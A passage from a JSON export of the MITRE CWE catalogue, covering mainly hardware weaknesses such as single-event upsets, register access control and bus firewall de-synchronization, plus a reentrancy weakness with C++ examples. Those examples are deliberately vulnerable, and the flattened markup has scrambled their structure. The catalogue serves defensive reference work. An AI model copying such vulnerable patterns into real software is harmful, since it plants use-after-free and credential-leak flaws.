ways."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-7096","Description":"virtualization product allows compromise of hardware product by accessing certain remapping registers.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7096"},{"Reference":"[REF-1100]","Description":"processor design flaw allows ring 0 code to access more privileged rings by causing a register window to overlap a range of protected system RAM [REF-1100]","Link":"https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1100"}}},"Notes":{"Note":{"#text":"As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"suggested content improvements"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"suggested observed examples"}]}},"1261":{"attr":{"@_ID":"1261","@_Name":"Improper Handling of Single Event Upsets","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware logic does not effectively handle when single-event upsets (SEUs) occur.","Extended_Description":{"xhtml:p":"Technology trends such as CMOS-transistor down-sizing, use of \\n new materials, and system-on-chip architectures continue to increase the \\n sensitivity of systems to soft errors. These errors are random, and \\n their causes might be internal (e.g., interconnect coupling) or external \\n (e.g., cosmic radiation). These soft errors are not permanent in nature \\n and cause temporary bit flips known as single-event upsets (SEUs). \\n SEUs are induced errors in circuits caused when charged particles lose \\n energy by ionizing the medium through which they pass, leaving behind a \\n wake of electron-hole pairs that cause temporary failures. If these \\n failures occur in security-sensitive modules in a chip, it might \\n compromise the security guarantees of the chip. For instance, these \\n temporary failures could be bit flips that change the privilege of\\n\\t a regular user to root."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1254","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Implement triple-modular redundancy around security-sensitive modules."}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"SEUs mostly affect SRAMs. For SRAMs storing security-critical data, implement Error-Correcting-Codes (ECC) and Address Interleaving."}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This is an example from [REF-1089]. See the reference for full details of this issue.","Body_Text":"Parity is error detecting but not error correcting.","Example_Code":[{"#text":"Due to single-event upsets, bits are flipped in memories. As a result, memory-parity checks fail, which results in restart and a temporary denial of service of two to three minutes.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Using error-correcting codes could have avoided the restart caused by SEUs.","attr":{"@_Nature":"good","@_Language":"Other"}}]},{"Intro_Text":"In 2016, a security researcher, who was also a patient using a pacemaker, was on an airplane when a bit flip occurred in the pacemaker, likely due to the higher prevalence of cosmic radiation at such heights. The pacemaker was designed to account for bit flips and went into a default safe mode, which still forced the patient to go to a hospital to get it reset. The bit flip also inadvertently enabled the researcher to access the crash file, perform reverse engineering, and detect a hard-coded key. [REF-1101]"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1086"}},{"attr":{"@_External_Reference_ID":"REF-1087"}},{"attr":{"@_External_Reference_ID":"REF-1088"}},{"attr":{"@_External_Reference_ID":"REF-1089"}},{"attr":{"@_External_Reference_ID":"REF-1090"}},{"attr":{"@_External_Reference_ID":"REF-1091"}},{"attr":{"@_External_Reference_ID":"REF-1101"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"}}},"1262":{"attr":{"@_ID":"1262","@_Name":"Improper Access Control for Register Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers.","Extended_Description":{"xhtml:p":"Software commonly accesses peripherals in a System-on-Chip (SoC) or other device through a memory-mapped register interface. Malicious software could tamper with any security-critical hardware data that is accessible directly or indirectly through the register interface, which could lead to a loss of confidentiality and integrity."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may be exploited if the register interface design does not adequately protect hardware assets from software."},{"Phase":"Implementation","Note":"Mis-implementation of access control policies may inadvertently allow access to hardware assets through the register interface."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Read Application Data","Modify Memory","Modify Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Unexpected State","Alter Execution Logic"],"Note":"Confidentiality of hardware assets may be violated if the protected information can be read out by software through the register interface. Registers storing security state, settings, other security-critical data may be corruptible by software without correctly implemented protections."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This is applicable in the Architecture phase before implementation started. Make sure access policy is specified for the entire memory map. Manual analysis may not ensure the implementation is correct.","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":"Registers controlling hardware should have access control implemented. This access control may be checked manually for correct implementation. Items to check consist of how are trusted parties set, how are trusted parties verified, how are accesses verified, etc. Effectiveness of a manual analysis will vary depending upon how complicated the interface is constructed.","Effectiveness":"Moderate"},{"Method":"Simulation / Emulation","Description":"Functional simulation is applicable during the Implementation Phase. Testcases must be created and executed for memory mapped registers to verify adherence to the access control policy. This method can be effective, since functional verification needs to be performed on the design, and verification for this weakness will be included. There can be difficulty covering the entire memory space during the test.","Effectiveness":"Moderate"},{"Method":"Formal Verification","Description":"Formal verification is applicable during the Implementation phase. Assertions need to be created in order to capture illegal register access scenarios and prove that they cannot occur. Formal methods are exhaustive and can be very effective, but creating the cases for large designs may be complex and difficult.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Information flow tracking can be applicable during the Implementation phase. Security sensitive data (assets) - for example, as stored in registers - is automatically tracked over time through the design to verify the data doesn\'t reach illegal destinations that violate the access policies for the memory map. This method can be very effective when used together with simulation and emulation, since detecting violations doesn\'t rely on specific scenarios or data values. This method does rely on simulation and emulation, so testcases must exist in order to use this method.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Manual documentation review of the system memory map, register specification, and permissions associated with accessing security-relevant functionality exposed via memory-mapped registers.","Effectiveness":"Moderate"},{"Method":"Fuzzing","Description":"Perform penetration testing (either manual or semi-automated with fuzzing) to verify that access control mechanisms such as the memory protection units or on-chip bus firewall settings adequately protect critical hardware registers from software access.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design proper policies for hardware register access from software."},{"Phase":"Implementation","Description":"Ensure that access control policies for register access are implemented in accordance with the specified design."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The register interface provides software access to hardware functionality. This functionality is an attack surface. This attack surface may be used to run untrusted code on the system through the register interface. As an example, cryptographic accelerators require a mechanism for software to select modes of operation and to provide plaintext or ciphertext data to be encrypted or decrypted as well as other functions. This functionality is commonly provided through registers.","Example_Code":[{"#text":"Cryptographic key material stored in registers inside the cryptographic accelerator can be accessed by software.","attr":{"@_Nature":"bad"}},{"#text":"Key material stored in registers should never be accessible to software. Even if software can provide a key, all read-back paths to software should be disabled.","attr":{"@_Nature":"good"}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-2915","Description":"virtualization product does not restrict access to debug and other processor registers in the hardware, allowing a crash of the host or guest OS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2915"},{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2020-12446","Description":"Driver exposes access to Model Specific Register (MSR) registers, allowing admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12446"},{"Reference":"CVE-2015-2150","Description":"Virtualization product does not restrict access to PCI command registers, allowing host crash from the guest.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2150"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"},"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods and observed examples"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-12","Contribution_Comment":"Provided detection methods"}]}},"1263":{"attr":{"@_ID":"1263","@_Name":"Improper Physical Access Control","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas.","Extended_Description":"Sections of a product intended to have restricted access may be inadvertently or intentionally rendered accessible when the implemented physical protections are insufficient. The specific requirements around how robust the design of the physical protection mechanism needs to be depends on the type of product being protected. Selecting the correct physical protection mechanism and properly enforcing it through implementation and manufacturing are critical to the overall physical security of the product.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1191","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1243","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness can arise if design decisions are made that do not align with the intended physical protection of the product"},{"Phase":"Manufacturing","Note":"While the architecture and design phase of the product may have accurately met the intended robustness for product physical protections, this phase may introduce the weakness through errors in physically manufacturing the product."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Specific protection requirements depend strongly on contextual factors including the level of acceptable risk associated with compromise to the product\'s protection mechanism. Designers could incorporate anti-tampering measures that protect against or detect when the product has been tampered with."},{"Phase":"Testing","Description":"The testing phase of the lifecycle should establish a method for determining whether the protection mechanism is sufficient to prevent unauthorized access."},{"Phase":"Manufacturing","Description":"Ensure that all protection mechanisms are fully activated at the time of manufacturing and distribution."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"401"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-05-28"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Physical Protection Mechanism","attr":{"@_Date":"2020-08-20"}}}},"1264":{"attr":{"@_ID":"1264","@_Name":"Hardware Logic with Insecure De-Synchronization between Control and Data Channels","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete.","Extended_Description":{"xhtml:p":"Many high-performance on-chip bus protocols and processor data-paths employ separate channels for control and data to increase parallelism and maximize throughput. Bugs in the hardware logic that handle errors and security checks can make it possible for data to be forwarded before the completion of the security checks. If the data can propagate to a location in the hardware observable to an attacker, loss of data confidentiality can occur. \'Meltdown\' is a concrete example of how de-synchronization between data and permissions checking logic can violate confidentiality requirements. Data loaded from a page marked as privileged was returned to the cpu regardless of current privilege level for performance reasons. The assumption was that the cpu could later remove all traces of this data during the handling of the illegal memory access exception, but this assumption was proven false as traces of the secret data were not removed from the microarchitectural state."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1037","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The weakness can be introduced in the data transfer or bus protocol itself or in the implementation."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Thoroughly verify the data routing logic to ensure that any error handling or security checks effectively block illegal dataflows."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"There are several standard on-chip bus protocols used in modern SoCs to allow communication between components. There are a wide variety of commercially available hardware IP implementing the interconnect logic for these protocols. A bus connects components which initiate/request communications such as processors and DMA controllers (bus masters) with peripherals which respond to requests. In a typical system, the privilege level or security designation of the bus master along with the intended functionality of each peripheral determine the security policy specifying which specific bus masters can access specific peripherals. This security policy (commonly referred to as a bus firewall) can be enforced using separate IP/logic from the actual interconnect responsible for the data routing.","Example_Code":[{"#text":"The firewall and data routing logic becomes de-synchronized due to a hardware logic bug allowing components that should not be allowed to communicate to share data. For example, consider an SoC with two processors. One is being used as a root of trust and can access a cryptographic key storage peripheral. The other processor (application cpu) may run potentially untrusted code and should not access the key store. If the application cpu can issue a read request to the key store which is not blocked due to de-synchronization of data routing and the bus firewall, disclosure of cryptographic keys is possible.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"All data is correctly buffered inside the interconnect until the firewall has determined that the endpoint is allowed to receive the data.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-5754","Description":"Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"233"}},{"attr":{"@_CAPEC_ID":"663"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1265":{"attr":{"@_ID":"1265","@_Name":"Unintended Reentrant Invocation of Non-reentrant Code Via Nested Calls","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During execution of non-reentrant code, the software performs a call that unintentionally produces a nested invocation of the non-reentrant code.","Extended_Description":"In complex software, a single function call may lead to many different possible code paths, some of which may involve deeply nested calls. It may be difficult to foresee all possible code paths that could emanate from a given function call. In some systems, an external actor can manipulate inputs to the system and thereby achieve a wide range of possible control flows. This is frequently of concern in software that executes script from untrusted sources. Examples of such software are web browsers and PDF readers. A weakness is present when one of the possible code paths resulting from a function call alters program state that the original caller assumes to be unchanged during the call.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"663","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"416","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Likelihood":"Unknown","Note":"Exploitation of this weakness can leave the application in an unexpected state and cause variables to be reassigned before the first invocation has completed. This may eventually result in memory corruption or unexpected code execution."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting a system that will execute untrusted code in response to events, consider executing the untrusted event handlers asynchronously (asynchronous message passing) as opposed to executing them synchronously at the time each event fires. The untrusted code should execute at the start of the next iteration of the thread\u2019s message loop. In this way, calls into non-reentrant code are strictly serialized, so that each operation completes fully before the next operation begins. Special attention must be paid to all places where type coercion may result in script execution. Performing all needed coercions at the very beginning of an operation can help reduce the chance of operations executing at unexpected junctures.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Make sure the code (e.g., function or class) in question is reentrant by not leveraging non-local data, not modifying its own code, and not calling other non-reentrant code.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The implementation of the Widget class in the following C++ code is an example of code that is not designed to be reentrant. If an invocation of a method of Widget inadvertently produces a second nested invocation of a method of Widget, then data member backgroundImage may unexpectedly change during execution of the outer call.","Example_Code":{"attr":{"@_Language":"C++","@_Nature":"bad"},"xhtml:div":{"#text":"class Widget{}class Image{}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"Image* backgroundImage;","attr":{"@_style":"margin-left:10px;"}},{"#text":"void click(){}void changeBackgroundImage(Image* newImage){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"if (backgroundImage){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"backgroundImage->click();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"if (backgroundImage){}backgroundImage = newImage;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"delete backgroundImage;","attr":{"@_style":"margin-left:10px;"}}}]}],"xhtml:br":""},{"#text":"public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"void click(){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"scriptEngine->fireOnImageClick();/* perform some operations using \u201cthis\u201d pointer */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}]}},"Body_Text":"Looking closer at this example, Widget::click() calls backgroundImage->click(), which in turn calls scriptEngine->fireOnImageClick(). The code within fireOnImageClick() invokes the appropriate script handler routine as defined by the document being rendered. In this scenario this script routine is supplied by an adversary and this malicious script makes a call to Widget::changeBackgroundImage(), deleting the Image object pointed to by backgroundImage. When control returns to Image::click, the function\u2019s \\"backgroundImage \\"this\\" pointer (which is the former value of backgroundImage) is a dangling pointer. The root of this weakness is that while one operation on Widget (click) is in the midst of executing, a second operation on the Widget object may be invoked (in this case, the second invocation is a call to different method, namely changeBackgroundImage) that modifies the non-local variable."},{"Intro_Text":"This is another example of C++ code that is not designed to be reentrant.","Example_Code":{"attr":{"@_Language":"C++","@_Nature":"bad"},"xhtml:div":{"#text":"class Request{}","xhtml:br":"","xhtml:div":{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"std::string uri;/* ... */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"void setup(ScriptObject* _uri){}void send(ScriptObject* _data){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"this->uri = scriptEngine->coerceToString(_uri);/* ... */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Credentials credentials = GetCredentials(uri);std::string data = scriptEngine->coerceToString(_data);doSend(uri, credentials, data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}],"xhtml:br":""}}},"Body_Text":"The expected order of operations is a call to Request::setup(), followed by a call to Request::send(). Request::send() calls scriptEngine->coerceToString(_data) to coerce a script-provided parameter into a string. This operation may produce script execution. For example, if the script language is ECMAScript, arbitrary script execution may result if _data is an adversary-supplied ECMAScript object having a custom toString method. If the adversary\'s script makes a new call to Request::setup, then when control returns to Request::send, the field uri and the local variable credentials will no longer be consistent with one another. As a result, credentials for one resource will be shared improperly with a different resource. The root of this weakness is that while one operation on Request (send) is in the midst of executing, a second operation may be invoked (setup)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-1772","Description":"In this vulnerability, by registering a malicious onerror handler, an adversary can produce unexpected re-entrance of a CDOMRange object. [REF-1098]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1772"},{"Reference":"CVE-2018-8174","Description":"This CVE covers several vulnerable scenarios enabled by abuse of the Class_Terminate feature in Microsoft VBScript. In one scenario, Class_Terminate is used to produce an undesirable re-entrance of ScriptingDictionary during execution of that object\u2019s destructor. In another scenario, a vulnerable condition results from a recursive entrance of a property setter method. This recursive invocation produces a second, spurious call to the Release method of a reference-counted object, causing a UAF when that object is freed prematurely. This vulnerability pattern has been popularized as \u201cDouble Kill\u201d. [REF-1099]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1098"}},{"attr":{"@_External_Reference_ID":"REF-1099"}}]},"Content_History":{"Submission":{"Submission_Name":"Simon Zuckerbraun","Submission_Organization":"Trend Micro","Submission_Date":"2018-12-20"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"}}},"1266":{"attr":{"@_ID":"1266","@_Name":"Improper Scrubbing of Sensitive Data from Decommissioned Device","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned. A scrubbing capability could be missing, insufficient, or incorrect.","Extended_Description":{"xhtml:p":"When a product is decommissioned - i.e., taken out of service - best practices or regulatory requirements may require the administrator to remove or overwrite sensitive data first, i.e. \\"scrubbing.\\" Improper scrubbing of sensitive data from a decommissioned device leaves that data vulnerable to acquisition by a malicious actor. Sensitive data may include, but is not limited to, device/manufacturer proprietary information, user/device credentials, network configurations, and other forms of sensitive data."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Policy"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Functionality to completely scrub data from a product at the conclusion of its lifecycle should be part of the design phase. Trying to add this function on top of an existing architecture could lead to incomplete removal of sensitive information/data."}},{"Phase":"Policy","Description":{"xhtml:p":"The manufacturer should describe the location(s) where sensitive data is stored and the policies and procedures for its removal. This information may be conveyed, for example, in an Administrators Guide or a Statement of Volatility."}},{"Phase":"Implementation","Description":{"xhtml:p":"If the capability to wipe sensitive data isn\'t built-in, the manufacturer may need to provide a utility to scrub sensitive data from storage if that data is located in a place which is non-accessible by the administrator. One example of this could be when sensitive data is stored on an EEPROM for which there is no user/admin interface provided by the system."}}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}},{"attr":{"@_CAPEC_ID":"546"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1080"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-05-28"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"}}},"1267":{"attr":{"@_ID":"1267","@_Name":"Policy Uses Obsolete Encoding","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an obsolete encoding mechanism to implement access controls.","Extended_Description":{"xhtml:p":"Within a System-On-a-Chip (SoC), various circuits and hardware engines generate transactions for the purpose of accessing (read/write) assets or performing various actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (identifying the originator of the transaction) and a destination identity (routing the transaction to the respective entity). Sometimes the transactions are qualified with a Security Token. This Security Token helps the destination agent decide on the set of allowed actions (e.g., access to an asset for reads and writes). A policy encoder is used to map the bus transactions to Security Tokens that in turn are used as access-controls/protection mechanisms. A common weakness involves using an encoding which is no longer trusted, i.e., an obsolete encoding."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","Modify Files or Directories","Read Files or Directories","DoS: Resource Consumption 